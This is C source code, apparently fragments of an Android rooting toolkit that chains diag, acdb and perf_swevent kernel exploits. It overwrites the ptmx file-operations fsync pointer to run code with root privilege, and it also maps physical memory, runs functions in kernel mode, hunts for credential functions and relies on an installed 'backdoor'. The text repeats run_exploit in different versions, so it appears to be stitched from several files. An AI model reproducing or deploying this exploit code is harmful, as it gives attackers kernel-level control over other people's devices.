static bool
run_exploit(void)
{
unsigned long int ptmx_fsync_address;
unsigned long int ptmx_fops_address;
ptmx_fops_address = get_ptmx_fops_address();
if (!ptmx_fops_address) {
return false;
}
ptmx_fsync_address = ptmx_fops_address + 0x38;
if (attempt_diag_exploit(ptmx_fsync_address)) {
return true;
}
printf("\n");
printf("Attempt acdb exploit...\n");
if (attempt_acdb_exploit(ptmx_fsync_address, 0)) {
return true;
}
printf("\n");
printf("Attempt perf_swevent exploit...\n");
return perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege,
run_obtain_root_privilege, NULL);
}
static bool
run_exploit(void)
{
void **ptmx_fsync_address;
unsigned long int ptmx_fops_address;
int fd;
bool ret;
ptmx_fops_address = get_ptmx_fops_address();
if (!ptmx_fops_address) {
return false;
}
if (!backdoor_open_mmap()) {
printf("Failed to mmap due to %s.\n", strerror(errno));
printf("Run 'install_backdoor' first\n");
return false;
}
ptmx_fsync_address = backdoor_convert_to_mmaped_address((void *)ptmx_fops_address + 0x38);
*ptmx_fsync_address = load_msmsdcc;
ret = run_load_msmsdcc(NULL);
*ptmx_fsync_address = NULL;
backdoor_close_mmap();
return ret;
}
bool ptmx_map_memory(unsigned long int map_address, unsigned long int physical_address, unsigned long int size)
{
unsigned long int ptmx_fops_address;
ptmx_fops_address = get_ptmx_fops_address();
if (!ptmx_fops_address) {
return false;
}
return fops_map_physical_memory((void *)ptmx_fops_address, PTMX_DEVICE, FOPS_RUN_BY_EXPLOIT, map_address, physical_address, size);
}
bool ptmx_run_in_kernel_mode(bool (*function)(void *), void *user_data)
{
unsigned long int ptmx_fops_address;
ptmx_fops_address = get_ptmx_fops_address();
if (!ptmx_fops_address) {
return false;
}
return fops_run_in_kernel_mode((void *)ptmx_fops_address, PTMX_DEVICE, FOPS_RUN_BY_KERNEL_MEMORY, function, user_data);
}
static bool
find_creds_functions_in_memory(void)
{
unsigned long int ptmx_mmap_address;
ptmx_mmap_address = get_ptmx_fops_address() + 0x28;
if (diag_is_supported()) {
return find_with_diag_exploit(ptmx_mmap_address);
}
return find_with_perf_swevent_exploit(ptmx_mmap_address);
}
